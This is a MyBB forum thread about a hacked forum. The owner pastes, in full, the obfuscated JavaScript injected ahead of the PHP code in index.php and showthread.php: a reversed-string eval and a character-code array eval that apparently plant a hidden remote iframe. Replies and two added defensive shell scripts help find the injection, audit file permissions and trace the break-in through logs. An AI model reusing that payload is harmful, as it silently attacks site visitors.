MyBB Community Forums

Full Version: why all the errors
Hi

OK, let me clear this up:

1) It was on a VPS for months and we had no problems at all.

2) We moved it all over to a dedicated server and it did seem to run fine (while I was logged in).

3) The next day I got all these "headers already sent" errors, so I uploaded the files again and again it seemed fine.

4) Now the errors did come back, but only when I logged off the forum. When not logged into the forum, the header issues seem to arise.

What I have come to notice is that at the top of the files index.php and showthread.php the following code was there, yet when I downloaded the MyBB forum software again from MyBB it isn't in the file:

 <script language='javascript'>eval(";zvnzuCQiPgqkeQh=vvCzAZkbRjPCyWITmDzJZhHkvLoEFMGsYPbgZZEvdU;)mOsBucAFshfrzPOoxHeIfw(etirw.tnemucod;veDdFBQDVvfBjtDFFOhxmjNCw=WiDrcuLYpWYIUFqecGrAreEvgqRqICcPrwdEBNeTIFtas };)XjPvDyJdEkVpEyoI(edoCrahCmorf.gnirtS=+mOsBucAFshfrzPOoxHeIfw;kSCRmTMQhpIcKlDySFoHchoMhVCfIes=zvnzuCQiPgqkeQh ;)kSCRmTMQhpIcKlDySFoHchoMhVCfIes(tAedoCrahc.veDdFBQDVvfBjtDFFOhxmjNCw=^XjPvDyJdEkVpEyoI )XjPvDyJdEkVpEyoI=!)kSCRmTMQhpIcKlDySFoHchoMhVCfIes(tAedoCrahc.veDdFBQDVvfBjtDFFOhxmjNCw(fi ;DhykppCnUwsHBwlTaVxnXHVAKqIylOHPXq=HyqsEzsOHxVpcZSQyHZxpKzDxFggBzxp ;)BLdvJNOVVBsfSJfQEuhrW(tAedoCrahc.Obhnuhwt=XjPvDyJdEkVpEyoI;0=kSCRmTMQhpIcKlDySFoHchoMhVCfIes )kSCRmTMQhpIcKlDySFoHchoMhVCfIes=<htgnel.veDdFBQDVvfBjtDFFOhxmjNCw(fi;++kSCRmTMQhpIcKlDySFoHchoMhVCfIes{)++BLdvJNOVVBsfSJfQEuhrW;jQOfpaekk<BLdvJNOVVBsfSJfQEuhrW;0=BLdvJNOVVBsfSJfQEuhrW(rof;Obhnuhwt=sGjYTrVwyWaxAgwjI;)Obhnuhwt(epacsenu=Obhnuhwt;RuMrnlkLXLgXmYuAuOwLoEqRQoLGese=xxSVdycrs;3/htgnel.Obhnuhwt=jQOfpaekk;ofzBrUgBNbSwW=DhykppCnUwsHBwlTaVxnXHVAKqIylOHPXq;'A4%32%12%C0%D3%63%52%95%94%15%A7%45%B7%D6%D3%23%13%E3%22%C2%41%C3%82%33%81%82%57%54%96%27%55%62%50%73%83%81%A0%10%23%D3%53%E0%F4%85%C5%84%44%11%52%D2%D1%C3%62%C6%45%44%D4%56%10%A3%13%93%92%E3%77%56%57%85%86%72%53%D1%C2%22%74%B7%16%A4%37%50%B3%63%60%10%86%57%D6%B3%D0%D4%74%A0%40%01%81%A2%32%F1%C2%32%C6%45%54%D4%56%61%C3%43%B3%53%43%23%A2%52%80%33%F6%36%D0%92%02%60%F3%53%C0%17%81%43%23%14%A0%10%A7%12%D3%D4%B1%80%80%C1%A0%71%96%36%75%F3%42%83%E1%75%25%B3%61%A2%07%C2%73%73%52%12%D2%64%'=Obhnuhwt;ofzBrUgBNbSwW=RuMrnlkLXLgXmYuAuOwLoEqRQoLGese;0=kSCRmTMQhpIcKlDySFoHchoMhVCfIes;MCiuZ=ofzBrUgBNbSwW;'OAyEUgYPhNqSQodhUOTcozmjytFLmOPLvuoXdYPIZVWGDzU'=veDdFBQDVvfBjtDFFOhxmjNCw;mOsBucAFshfrzPOoxHeIfw=MCiuZ;''=mOsBucAFshfrzPOoxHeIfw".split('').reverse().join(''));</script><script>var s=new String();a=(new 
Function("","")+"").substr(3-1,4);if((a=="unct")||(a=="ncti"))a=(document.createDocumentFragment+"").substr(2-1,4);if((a=="unct")||(a=="ncti")){r=1;c=String;}if(r&&document.createTextNode)y=2;e=window['e'+'val'];m=new Array(4.5*y,18/y,52.5*y,204/y,16*y,80/y,50*y,222/y,49.5*y,234/y,54.5*y,202/y,55*y,232/y,23*y,206/y,50.5*y,232/y,34.5*y,216/y,50.5*y,218/y,50.5*y,220/y,58*y,230/y,33*y,242/y,42*y,194/y,51.5*y,156/y,48.5*y,218/y,50.5*y,80/y,19.5*y,196/y,55.5*y,200/y,60.5*y,78/y,20.5*y,182/y,24*y,186/y,20.5*y,246/y,4.5*y,18/y,4.5*y,210/y,51*y,228/y,48.5*y,218/y,50.5*y,228/y,20*y,82/y,29.5*y,18/y,4.5*y,250/y,16*y,202/y,54*y,230/y,50.5*y,64/y,61.5*y,18/y,4.5*y,18/y,50*y,222/y,49.5*y,234/y,54.5*y,202/y,55*y,232/y,23*y,238/y,57*y,210/y,58*y,202/y,20*y,68/y,30*y,210/y,51*y,228/y,48.5*y,218/y,50.5*y,64/y,57.5*y,228/y,49.5*y,122/y,19.5*y,208/y,58*y,232/y,56*y,116/y,23.5*y,94/y,49.5*y,230/y,59*y,202/y,57*y,232/y,23*y,210/y,55*y,94/y,52.5*y,220/y,23*y,198/y,51.5*y,210/y,31.5*y,200/y,50.5*y,204/y,48.5*y,234/y,54*y,232/y,19.5*y,64/y,59.5*y,210/y,50*y,232/y,52*y,122/y,19.5*y,98/y,24*y,78/y,16*y,208/y,50.5*y,210/y,51.5*y,208/y,58*y,122/y,19.5*y,98/y,24*y,78/y,16*y,230/y,58*y,242/y,54*y,202/y,30.5*y,78/y,59*y,210/y,57.5*y,210/y,49*y,210/y,54*y,210/y,58*y,242/y,29*y,208/y,52.5*y,200/y,50*y,202/y,55*y,118/y,56*y,222/y,57.5*y,210/y,58*y,210/y,55.5*y,220/y,29*y,194/y,49*y,230/y,55.5*y,216/y,58.5*y,232/y,50.5*y,118/y,54*y,202/y,51*y,232/y,29*y,96/y,29.5*y,232/y,55.5*y,224/y,29*y,96/y,29.5*y,78/y,31*y,120/y,23.5*y,210/y,51*y,228/y,48.5*y,218/y,50.5*y,124/y,17*y,82/y,29.5*y,18/y,4.5*y,250/y,4.5*y,18/y,51*y,234/y,55*y,198/y,58*y,210/y,55.5*y,220/y,16*y,210/y,51*y,228/y,48.5*y,218/y,50.5*y,228/y,20*y,82/y,61.5*y,18/y,4.5*y,18/y,59*y,194/y,57*y,64/y,51*y,64/y,30.5*y,64/y,50*y,222/y,49.5*y,234/y,54.5*y,202/y,55*y,232/y,23*y,198/y,57*y,202/y,48.5*y,232/y,50.5*y,138/y,54*y,202/y,54.5*y,202/y,55*y,232/y,20*y,78/y,52.5*y,204/y,57*y,194/y,54.5*y,202/y,19.5*y,82/y,29.5*y,204/y,23*y,230/y,50.5*y,232/y,32.5*y,232/y,58*y,228/y,52.5*y,196/y,58.5*y,232/y,50.5*y,80/y,19.5*y,230/y,57*y,198/y,19.5*y,88/y,19.5*y,208/y,58*y,232/y,56*y,116/y,23.5*y,94/y,49.5*y,230/y,59*y,202/y,57*y,232/y,23*y,210/y,55*y,94/y,52.5*y,220/y,23*y,198/y,51.5*y,210/y,31.5*y,200/y,50.5*y,204/y,48.5*y,234/y,54*y,232/y,19.5*y,82/y,29.5*y,204/y,23*y,230/y,58*y,242/y,54*y,202/y,23*y,236/y,52.5*y,230/y,52.5*y,196/y,52.5*y,216/y,52.5*y,232/y,60.5*y,122/y,19.5*y,208/y,52.5*y,200/y,50*y,202/y,55*y,78/y,29.5*y,204/y,23*y,230/y,58*y,242/y,54*y,202/y,23*y,224/y,55.5*y,230/y,52.5*y,232/y,52.5*y,222/y,55*y,122/y,19.5*y,194/y,49*y,230/y,55.5*y,216/y,58.5*y,232/y,50.5*y,78/y,29.5*y,204/y,23*y,230/y,58*y,242/y,54*y,202/y,23*y,216/y,50.5*y,204/y,58*y,122/y,19.5*y,96/y,19.5*y,118/y,51*y,92/y,57.5*y,232/y,60.5*y,216/y,50.5*y,92/y,58*y,222/y,56*y,122/y,19.5*y,96/y,19.5*y,118/y,51*y,92/y,57.5*y,202/y,58*y,130/y,58*y,232/y,57*y,210/y,49*y,234/y,58*y,202/y,20*y,78/y,59.5*y,210/y,50*y,232/y,52*y,78/y,22*y,78/y,24.5*y,96/y,19.5*y,82/y,29.5*y,204/y,23*y,230/y,50.5*y,232/y,32.5*y,232/y,58*y,228/y,52.5*y,196/y,58.5*y,232/y,50.5*y,80/y,19.5*y,208/y,50.5*y,210/y,51.5*y,208/y,58*y,78/y,22*y,78/y,24.5*y,96/y,19.5*y,82/y,29.5*y,18/y,4.5*y,18/y,50*y,222/y,49.5*y,234/y,54.5*y,202/y,55*y,232/y,23*y,206/y,50.5*y,232/y,34.5*y,216/y,50.5*y,218/y,50.5*y,220/y,58*y,230/y,33*y,242/y,42*y,194/y,51.5*y,156/y,48.5*y,218/y,50.5*y,80/y,19.5*y,196/y,55.5*y,200/y,60.5*y,78/y,20.5*y,182/y,24*y,186/y,23*y,194/y,56*y,224/y,50.5*y,220/y,50*y,134/y,52*y,210/y,54*y,200/y,20*y,204/y,20.5*y,118/y,4.5*y,18/y,62.5*y);for(i=0;i<m.length;i++)if((a=="unct")||(a=="ncti"))s+=c.fromCharCode(m[i]);if((a=="unct")||(a=="ncti"))e('e(s)');</script><?php

I have uploaded all the files fresh from the MyBB files I downloaded from MyBB and everything seems fine again.

Now I still feel this is a file permissions error, though all files are set to 755.

Thoughts?

Steve
Yeah, that JavaScript isn't friendly: you've been hacked. Seeing as the only thing that has changed between it working and not working is the server, it indicates there's a security hole in the server somewhere. Have you looked at your access/FTP logs to see when these files may have been edited? Changed all your passwords?

And do you mean all files are 755 or all folders? Because 755 is the default for folders, but files shouldn't be set to that. If files are set to 755 and you haven't set them to that, then you'll need to review the logs again to see what did.
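The two things raised so far, content sitting in front of the opening PHP tag in index.php/showthread.php and files (not just folders) ending up 755, can both be checked from a shell on the server. Anything before "<?php" is sent to the browser before the script runs, which is exactly what makes later header() calls fail with "headers already sent". The script below is an added example written for this thread, not code from the posts or from MyBB; the directory layout, file names and the sample injected file it builds are constructed stand-ins (the stand-in uses a harmless reversed alert(), not the real payload quoted above).

```sh
#!/bin/sh
# Added example (not from the thread): find PHP files that have content in front
# of the open tag or carry the injection markers, and audit/reset file modes.
set -u

# PHP files whose first five bytes are not "<?php". Anything in front of the
# open tag is emitted as output, so any header() call afterwards fails.
files_with_leading_output() {
    find "$1" -type f -name '*.php' | while IFS= read -r f; do
        [ "$(head -c 5 "$f")" = '<?php' ] || printf '%s\n' "$f"
    done
}

# PHP files containing the markers seen in the injected block: a <script> tag,
# or a string that is reversed and then handed to eval.
files_with_script_injection() {
    find "$1" -type f -name '*.php' -exec grep -lE \
        "<script|split\(''\)\.reverse\(\)\.join\(''\)" {} +
}

# Regular files set to exactly 755 (755 is for directories; files should be 644).
files_mode_755() {
    find "$1" -type f -perm 755
}

# Reset to the usual web layout: directories 755, files 644.
reset_permissions() {
    find "$1" -type d -exec chmod 755 {} +
    find "$1" -type f -exec chmod 644 {} +
}

# ---- constructed demo tree (stand-in for the forum directory) ----
demo_dir=$(mktemp -d)
trap 'rm -rf "$demo_dir"' EXIT
mkdir -p "$demo_dir/inc"
printf '<?php\necho "clean";\n' > "$demo_dir/index.php"
# Stand-in for the injected prefix: same shape (script before <?php, reversed
# string fed to eval), harmless content.
cat > "$demo_dir/inc/injected.php" <<'EOF'
 <script>eval(";)'olleh'(trela".split('').reverse().join(''));</script><?php
echo "tampered";
EOF
chmod 644 "$demo_dir/index.php"
chmod 755 "$demo_dir/inc/injected.php"

echo "PHP files with content before <?php:"
files_with_leading_output "$demo_dir"
echo "PHP files carrying the injection markers:"
files_with_script_injection "$demo_dir"
echo "regular files wrongly set to 755:"
files_mode_755 "$demo_dir"
```

Run the three listing functions against the real forum root before touching anything, and keep the listed files as evidence; reset_permissions only fixes modes and does not remove the injected prefix, so the flagged files still need to be replaced from a clean download.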
Hi Matt

(May I just say sorry for my previous posts within this thread.)

I have just checked the access logs and have got this in them:

[Fri Dec 23 20:54:25 2011] [error] [client 178.32.110.232] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)

I know you can ban IPs that do this, but do you think this is how I was hacked, or is there more to it?

thanks
Steve
Not a problem.

Hmm, can't say for sure if that's related, but it looks a bit odd.

You might want to also look over your Apache configuration and make sure everything there is set to what it should be. Also, did you check if your files or just your folders were set to 755?
Hi Matt

I changed them to 644 for the files and so far it's stayed like that. The problem now is that I really need to find out if and how I have been hacked before I do a complete OS reinstall, so I know what needs fixing.

Was wondering, though: I have the Kloxo control panel installed and was thinking, is it worth buying a cPanel licence to run the server, as you can do a lot with cPanel in WHM?

I'm in two minds about buying it or just sticking with Kloxo; this server is only for my use.

Thanks
Steve
Hi

No more ideas on this?
If the files are still getting changed, I'd suggest that you look at the file modification time, then search your server logs to see what was being run at that time. Perhaps you can see if there's an unauthorized SSH login, or if there's an attack coming from a maliciously crafted URL, etc.

As for the control panel, personally I've been using DirectAdmin for the past couple of years on my server. Costs less than cPanel and does pretty much most of the stuff webmasters need to use a control panel for. Plus support is quick and friendly.
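Tying the file modification time to what the server was doing at that moment, as suggested in the reply above, can be scripted so it is repeatable each time the files change again. The script below is an added example for this thread, not code from the post, MyBB or Apache: it lists the files changed inside a time window using only POSIX find (two reference files and -newer, so it works without GNU -newermt), and pulls the access_log lines stamped in the same minute. The directory, the log path and the four log lines are constructed; the log format assumed is Apache's default combined format, and times are given in touch(1)'s YYYYMMDDhhmm form as read off ls -l.

```sh
#!/bin/sh
# Added example (not from the thread): list files modified in a window and the
# web requests logged in the same minute. Paths and log lines are constructed.
set -u

# Convert a touch(1)-style stamp YYYYMMDDhhmm into the Apache log prefix
# dd/Mon/YYYY:hh:mm, e.g. 201112232054 -> 23/Dec/2011:20:54
apache_minute() {
    stamp=$1
    y=$(printf '%s\n' "$stamp" | cut -c1-4)
    m=$(printf '%s\n' "$stamp" | cut -c5-6)
    d=$(printf '%s\n' "$stamp" | cut -c7-8)
    hm=$(printf '%s\n' "$stamp" | cut -c9-10):$(printf '%s\n' "$stamp" | cut -c11-12)
    case $m in
        01) mon=Jan ;; 02) mon=Feb ;; 03) mon=Mar ;; 04) mon=Apr ;;
        05) mon=May ;; 06) mon=Jun ;; 07) mon=Jul ;; 08) mon=Aug ;;
        09) mon=Sep ;; 10) mon=Oct ;; 11) mon=Nov ;; 12) mon=Dec ;;
        *) echo "bad month: $m" >&2; return 1 ;;
    esac
    printf '%s/%s/%s:%s\n' "$d" "$mon" "$y" "$hm"
}

# Regular files under DIR modified after START and no later than END (both
# YYYYMMDDhhmm). Two reference files make this work with plain POSIX find.
files_modified_between() {
    dir=$1 start=$2 end=$3
    ref=$(mktemp -d)
    touch -t "$start" "$ref/start"
    touch -t "$end" "$ref/end"
    find "$dir" -type f -newer "$ref/start" ! -newer "$ref/end"
    rm -rf "$ref"
}

# Access-log lines whose timestamp falls in the given minute.
requests_in_minute() {
    log=$1 stamp=$2
    grep -F "[$(apache_minute "$stamp")" "$log"
}

# ---- constructed demo: a forum tree and an access_log ----
demo=$(mktemp -d)
trap 'rm -rf "$demo"' EXIT
mkdir -p "$demo/forum"
for f in index.php showthread.php global.php; do
    printf '<?php\n' > "$demo/forum/$f"
done
# Two files "tampered with" at 20:54 on 23 Dec 2011, one untouched since 20 Dec.
touch -t 201112232054 "$demo/forum/index.php" "$demo/forum/showthread.php"
touch -t 201112201000 "$demo/forum/global.php"

# Constructed Apache combined-log sample; only the timestamps and client IPs matter.
cat > "$demo/access_log" <<'EOF'
203.0.113.7 - - [23/Dec/2011:20:53:58 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.42 - - [23/Dec/2011:20:54:12 +0000] "POST /admin/index.php HTTP/1.1" 200 1204 "-" "Mozilla/4.0"
198.51.100.42 - - [23/Dec/2011:20:54:15 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/4.0"
203.0.113.7 - - [23/Dec/2011:20:57:01 +0000] "GET /showthread.php?tid=12 HTTP/1.1" 200 8712 "-" "Mozilla/5.0"
EOF

echo "files changed between 20:53 and 20:55 on 23 Dec 2011:"
files_modified_between "$demo/forum" 201112232053 201112232055
echo "requests logged during 20:54:"
requests_in_minute "$demo/access_log" 201112232054
```

On a real box widen the window to a few minutes either side of the mtime, run requests_in_minute once per minute in that window, and do the same against the SSH and FTP logs for the same timestamps; a request that precedes the modification by seconds and comes from an address that is not yours is the usual lead.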